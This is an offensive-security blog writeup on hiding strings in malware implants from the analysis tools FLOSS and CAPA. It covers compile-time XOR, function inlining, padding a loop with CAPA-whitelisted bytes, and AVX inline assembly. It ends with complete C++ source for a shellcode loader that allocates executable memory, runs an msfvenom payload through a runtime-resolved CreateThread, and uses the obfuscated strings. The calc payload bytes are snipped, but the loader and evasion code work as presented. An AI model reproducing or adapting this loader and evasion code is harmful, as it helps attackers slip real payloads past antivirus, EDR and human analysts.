Advanced String Obfuscation

Sunday, December 3, 2023

Part One: Introduction

What is String Obfuscation?

String obfuscation is the deliberate process of hiding plaintext indicators of compromise, artifacts, or functionality behind some type of arithmetic transformation. Most modern malware employs some form of string obfuscation, and how effective a given technique is depends on the tool or analyst examining it. It is usually done in tandem with dynamic address resolution of WinAPI function calls to hide the true functionality of the malware. Antivirus (AV), Endpoint Detection and Response (EDR), and analysts’ tools employ different techniques to overcome obfuscation or at least circumvent the benefits it provides to offensive operators. Among the more powerful of these techniques is emulated analysis from tailored malware analysis tools like Mandiant’s FLOSS and CAPA, but it’s not uncommon for the basic strings utility to provide significant value in manual analysis.

How do we implement string obfuscation?

String obfuscation comes in many forms. For offensive tool development, the most common options are XOR, RC4, or potentially a hashing algorithm like djb2 if you’re able to query values from the system that contain your target value and compare hashes. These operational security (OPSEC) techniques have been used for a long time, so it should be no surprise that tools like FLOSS and CAPA are able to emulate the deobfuscation routines in malware or detect the presence of obfuscation, respectively. Either of these outcomes is undesirable in offensive development, so in this writeup we’ll talk about some modern techniques we can use to circumvent these tools and maintain the OPSEC of our implementation.
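To make the two simplest building blocks concrete, here is a minimal sketch of a djb2 hash and a single-byte XOR transform in portable C++. The function names (djb2, xor_bytes, matches) are hypothetical and chosen for illustration only; they are not taken from the implant code in this writeup.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// djb2: start at 5381 and fold each byte in as hash * 33 + byte.
constexpr std::uint32_t djb2(const char* s) {
    std::uint32_t hash = 5381;
    while (*s) {
        hash = hash * 33u + static_cast<unsigned char>(*s++);
    }
    return hash;
}

// Single-byte XOR is its own inverse: applying it twice with the
// same key restores the original bytes.
inline std::string xor_bytes(std::string data, unsigned char key) {
    for (char& c : data) {
        c = static_cast<char>(static_cast<unsigned char>(c) ^ key);
    }
    return data;
}

// Hypothetical helper: compare a name seen at runtime against a
// precomputed hash instead of against a plaintext string.
inline bool matches(const char* candidate, std::uint32_t wanted) {
    return djb2(candidate) == wanted;
}
```

The hash is one-way, so it only helps when the candidate names can be enumerated at runtime and hashed for comparison. XOR is reversible, which is why it is used when the original string has to be recovered.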

Note: If you’re already familiar with conventional string obfuscation techniques and why they’re implemented, feel free to skip to Part Three.

Part Two: Getting Started

Unobfuscated Operations

Before we dive into the obfuscation itself, let’s briefly take a look at the strings that a normal implant might leak. Below, we have a standard VirtualAlloc -> RtlCopyMemory -> CreateThread implant that detonates an MSFVenom calc payload.

If we take a look at our implant’s Import Address Table (IAT), we’ll see that the functions our program is importing leak the entire functionality of our program.

This view is very compiler dependent, so you might find that your executable’s IAT contains something different here but that’s perfectly normal. All we’re trying to look at here is that the functions we’re calling are visible to trivial static analysis.

Additionally, if we run the strings utility, we similarly see that by default we leak a lot of information about our implant.

Without the compiler’s “-s” option, which strips symbol names from our executable, we leak the actual variable names from our source code and give away that we’re trying to execute a payload.

Obviously, that’s a lot of information we don’t want to give to defenders so we have to elevate the technical threshold of our implant with some type of solution. The most common way is WinAPI pointers.

WinAPI Pointers

WinAPI pointers let us define a typedef, resolve the address of a WinAPI function, and then call that function through the pointer at runtime rather than binding it through the import table at build time. For brevity we’ll implement this obfuscation only on the call to CreateThread, but the implementation pattern is identical for all WinAPI functions.

However, even though CreateThread is removed from the IAT, the “CreateThread” string is still visible to the strings utility.

Here, we find the first use case for string obfuscation.

Part Three: Diving In

Compile-Time Trickery

In a truly classic implementation, we would use a builder script or manually encrypt key strings to hide from the Strings utility. But because we’re implementing this functionality in C++, we can actually leverage constant expressions to automatically encrypt our strings with an XOR key at compile time (1).

Lines 7-9 set up the KEY macro, a compile-time macro that generates a pseudo-random 1-byte XOR key based on the time of the build.
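The arithmetic behind that key can be sketched as a small constexpr function. This is an illustration only, assuming the standard "HH:MM:SS" layout of __TIME__; key_from_time and kBuildKey are hypothetical names that do not appear in the original source.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helper mirroring the KEY macro: convert "HH:MM:SS" into
// seconds since midnight and keep only the low byte.
constexpr std::uint8_t key_from_time(const char (&t)[9]) {
    return static_cast<std::uint8_t>(
        ((t[7] - '0') * 1     + (t[6] - '0') * 10 +     // seconds
         (t[4] - '0') * 60    + (t[3] - '0') * 600 +    // minutes
         (t[1] - '0') * 3600  + (t[0] - '0') * 36000)   // hours
        & 0xFF);
}

// 12:34:56 is 45296 seconds after midnight, and 45296 & 0xFF == 0xF0.
static_assert(key_from_time("12:34:56") == 0xF0, "low byte of 45296");

// The key for this particular build, fixed when the file is compiled.
constexpr std::uint8_t kBuildKey = key_from_time(__TIME__);
```

One consequence worth noting: whenever the seconds-since-midnight value is a multiple of 256 (for example a build at 00:04:16), the key is 0 and the XOR leaves the strings unchanged.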

Lines 17-24 set up the STR macro, a lambda wrapped in a C macro that we’ll place around key strings in our executable so that the obfuscator’s constexpr constructor on lines 37-45 runs at compile time.

Finally, lines 51-57 are the deobfuscation function, which is called at runtime to hand the unobfuscated string to the function that needs it.
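The encode-at-compile-time, decode-at-runtime round trip described above can be reduced to the following portable sketch. It is a simplified illustration, not the author’s obfuscator: XorString, make_xor, kKey, and kGreeting are hypothetical names, the key is a fixed constant, and the decode step is plain C++.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

constexpr unsigned char kKey = 0x5A;  // assumption: fixed key for this sketch

template <std::size_t N>
struct XorString {
    unsigned char data[N] = {};  // encoded bytes, including the terminator

    // constexpr constructor: can be evaluated entirely by the compiler.
    constexpr XorString(const char (&s)[N]) {
        for (std::size_t i = 0; i < N; ++i) {
            data[i] = static_cast<unsigned char>(
                static_cast<unsigned char>(s[i]) ^ kKey);
        }
    }

    // Runtime decode: XOR with the same key restores the original bytes.
    std::string decode() const {
        std::string out;
        for (std::size_t i = 0; i + 1 < N; ++i) {  // skip the terminator
            out.push_back(static_cast<char>(data[i] ^ kKey));
        }
        return out;
    }
};

// Helper so the array length is deduced from the literal.
template <std::size_t N>
constexpr XorString<N> make_xor(const char (&s)[N]) {
    return XorString<N>(s);
}

// Declaring the object constexpr forces the encoding to happen at compile time.
constexpr auto kGreeting = make_xor("hello");
static_assert(kGreeting.data[0] == ('h' ^ kKey), "first byte is encoded");
```

Calling kGreeting.decode() at runtime yields the original text. The design point is the constexpr object: without it the compiler is allowed, but not required, to evaluate the constructor at compile time.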

To use the macro we discussed above, we can wrap any interesting strings with “STR()” and we should see them disappear from the strings dump. But let’s quickly make sure that our implementation works. I took the liberty of implementing my own version of MemCopy, just to get rid of the linking to the C Runtime Library (ucrt.dll).

We can see that the “CreateThread” string literal does exist in the source, but the compiler uses the macro we established above to hide it from the strings utility, just like we expect. Most obfuscation discussions end here, but we’re just getting started, because more advanced tools will still find our “CreateThread” string.

FLOSS

As mentioned earlier in this writeup and elsewhere on my blog, FLOSS has a powerful string deobfuscation engine that emulates a program’s deobfuscation routines. In previous writeups I’ve demonstrated that using a two-step deobfuscation approach will bypass FLOSS’ ability to automate the deobfuscation process. However, there are a couple more interesting ways to bypass FLOSS’ analysis, and we’ll be covering these bypasses and how they work in detail.

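Per the FLOSS documentation, FLOSS can extract the string types enumerated below.

1. static strings: “regular” ASCII and UTF-16LE strings
2. stack strings: strings constructed on the stack at run-time
3. tight strings: a special form of stack strings, decoded on the stack
4. decoded strings: strings decoded in a function

The first three bullet points are fairly boring, but bullet point 4 contains a key word: “function”.

If you recall, our implementation worked based on a lambda function that actually consisted of several nested operations. Let’s take a look at what happens with a couple of subtle changes to the instructions we give our compiler.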

When we tell the compiler to inline these functions, instead of using the “call” instruction that will move RIP to another area in our program’s .text section, the compiler will put the function inside of the calling function. Let’s take a look at what that looks like in a disassembler.

On the left we’re able to see that in mk2 of our implant, our entry function (_start) does in fact call a function that then uses the xor opcode at address 140001356 (center) to perform the XOR decryption. However, on the right, in mk3 of our implant, we see that the XOR decryption happens inline within the _start() function itself because we applied the always_inline attribute to our deobfuscation function. And if we run FLOSS on the mk3 version of our implant, it’s unable to decode our strings.

The above method works because we attacked one of the fundamental assumptions that FLOSS makes when determining where to apply its deobfuscation analysis: that strings are decoded in a distinct function it can identify and emulate.

CAPA

Even though mk3 was capable of bypassing FLOSS’ detection, let’s take a look at another tool that an analyst might use to understand how our implant works.

Obviously, being able to detect the type of obfuscation we’re using is not as serious of a problem as being able to extract the deobfuscated strings, but it’s worth discussing a couple of ways to overcome this. CAPA makes its signatures public, so let’s take a look at the XOR signature.

Reading this rule, it’s going to match on a tight loop that contains a non-zeroing XOR, meaning an XOR that is not simply clearing a register. However, the rule also includes a list of whitelisted values we can potentially use to overcome this detection.

Above we can see that on line 56 we apply a relative jump over the whitelist bytes on line 57. This ensures that the bytes are included in the tight loop without affecting the arithmetic of the XOR operations.

Both of the above methods revolved around attacking the mechanics of these specific tools. Next, let’s take a look at a way we can overcome FLOSS by using a modern(ish) CPU feature.

Advanced Vector Extensions (AVX)

AVX was first introduced into processors in 2011. It provides wider registers and new instructions intended to perform arithmetic on many values at once.

Because this is a newer processor feature that uses non-standard registers, it’s reasonable to investigate whether or not FLOSS can handle emulating AVX operations. There are a couple of different versions of AVX, but most modern processors include support for the XMM registers and the operations we need to break FLOSS’ emulation.

The snippet above has detailed comments, but let’s briefly discuss what’s happening. The inline assembly snippet is taking in a UINT pointer to our destination. This is important because we’re using the vmovd instruction on line 62 to get the output from xmm0 to our destination buffer. We similarly cast the source buffer as a UINT pointer so that we can pass it into xmm1, and we pass in the key with the “r” constraint, so the compiler knows to put it into a general purpose register before interacting with the inline assembly snippet.

If we run FLOSS with the debug flag, we can actually see exactly where it’s falling short. Looking at the debug output, a couple of things become obvious. Firstly, our suspicions were correct: FLOSS cannot emulate some AVX functionality. And secondly, this actually seems to have more to do with the vivisect Python library that FLOSS depends on than with FLOSS itself.

In the above screenshot we can see that FLOSS is unable to emulate the vmovd instruction from xmm0 to the pointer destination stored in RCX. Because of this limitation in the vivisect emulation that FLOSS relies on, it cannot determine what value gets stored in the output buffer (data[]).

CAPA is similarly limited, and is unable to match the AVX opcodes to the XOR encoding rule that we discussed earlier in this writeup.

Part Four: The Code

exotic_xor_mk4.cpp

// x86_64-w64-mingw32-g++ exotic_xor_mk4.cpp -O0 -s -o exotic_xor_mk4.exe -masm=intel -nostdlib -lkernel32
// mk1, mk2, and mk3 available on https://patreon.com/0xtriboulet

#include <stdio.h>
#include <windows.h>

#define KEY ((((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 \
                   + (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 \
                   + (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000) & 0xFF))

// 
/*
 * This macro is a lambda function to pack all required steps into one single command
 * when defining strings.
 */
#define STR(str) \
    []() -> char* __attribute__((always_inline)) { \
        constexpr auto size = sizeof(str)/sizeof(str[0]); \
        obfuscator<size> obfuscated_str(str); \
        static char original_string[size] = {0}; \
        obfuscated_str.deobfuscate((unsigned char *)original_string); \
        return original_string; \
    }()
	
// MemCopy prototype	
VOID * MemCopy (VOID *dest, CONST VOID *src, SIZE_T len);

template <UINT N>
struct obfuscator {
    /*
     * m_data stores the obfuscated string.
     */
    UCHAR m_data[N] = {0};
  
    /*
     * Using constexpr ensures that the strings will be obfuscated in this
     * constructor function at compile time.
     */
    constexpr obfuscator(CONST CHAR* data) {
        /*
         * Implement encryption algorithm here.
         * Here we have simple XOR algorithm.
         */
        for (UINT i = 0; i < N; i++) {
            m_data[i] = data[i] ^ KEY;
        }
    }
	
    /*
     * deobfuscate decrypts the strings. Implement decryption algorithm here.
     * Here we have a simple XOR algorithm.
     */
    VOID deobfuscate(UCHAR * des) CONST{
        UINT i = 0;
        do {
            // des[i] = m_data[i] ^ KEY;
	__asm__(
		"vmovd xmm1, %[source];"                             // Move source to xmm1
		"vmovd xmm2, %[key];"                                // Move key to xmm2
		"vpxor xmm0, xmm1, xmm2;"                            // XOR xmm1 and xmm2, result in xmm0
		"vmovd %[destination], xmm0;"                        // Move result from xmm0 to destination
		: [destination] "=m" (*(UINT*)&des[i])               // Ensure correct size
		: [source] "m" (*(UINT*)&m_data[i]), [key] "r" (KEY) // Pass in source and KEY
		: "xmm0", "xmm1", "xmm2"                             // Clobbered registers
	);
			
            i++;
        } while (des[i-1]);
    }
	
	
};


typedef HANDLE (WINAPI * CreateThread_t)(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

// msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f rust
UCHAR ucPayload[] = {...snip...};

SIZE_T szPayload = sizeof(ucPayload);

INT __main(){
	
    LPVOID  lpExecMem = NULL;

	
    // allocate memory
    lpExecMem = VirtualAlloc(NULL,szPayload,MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    
    // copy memory
    MemCopy(lpExecMem, ucPayload, szPayload);
    
	// resolve CreateThread
	CreateThread_t pCreateThread = (CreateThread_t) GetProcAddress(GetModuleHandle(STR("kernel32")),STR("CreateThread"));
	
    // create thread
    HANDLE hThread = NULL;
    hThread = pCreateThread(NULL,0x0,(LPTHREAD_START_ROUTINE)lpExecMem, NULL, 0x0, NULL);

    // wait
    WaitForSingleObject(hThread, INFINITE);
    
    return 0;
}


// Just to get rid of CRT
VOID * MemCopy (VOID *dest, CONST VOID *src, SIZE_T len){
  UCHAR * d = (UCHAR *) dest;
  CONST UCHAR* s = (UCHAR *) src;
  while (len--){
    *d++ = *s++;
  }
  return dest;
}

Part Five: Results

Implementing AVX XOR obfuscation allowed us to bypass both FLOSS and CAPA.

Part Six: Conclusion

In Part Three, we saw the impact of our evasions on some of the most robust open source reverse engineering tools available. Of these evasions, the implementation of the XOR decryption using AVX inline assembly proved to be the most robust in evading both CAPA and FLOSS without the need to include whitelist bytes, function inlining, or a two-stage deobfuscation. The implementation in this writeup is not the most efficient, but it’s nonetheless effective in achieving modern string obfuscation.

It's unlikely that the limitations covered in this writeup are exhaustive. The vivisect library used by both CAPA and FLOSS has limited documentation, but it’s likely that other emulation limitations exist that can be leveraged to achieve similar or superior obfuscation results.

This writeup arbitrarily chose to focus on the XOR algorithm of obfuscation for simplicity and clarity. More complex algorithms may be obfuscated beyond the detection threshold of the tools discussed in this writeup with varying degrees of complexity. However, this writeup serves as a good starting point in the development of advanced string obfuscation mechanics.

Special thanks to my supporters on Patreon that made all the research leading up to this writeup possible.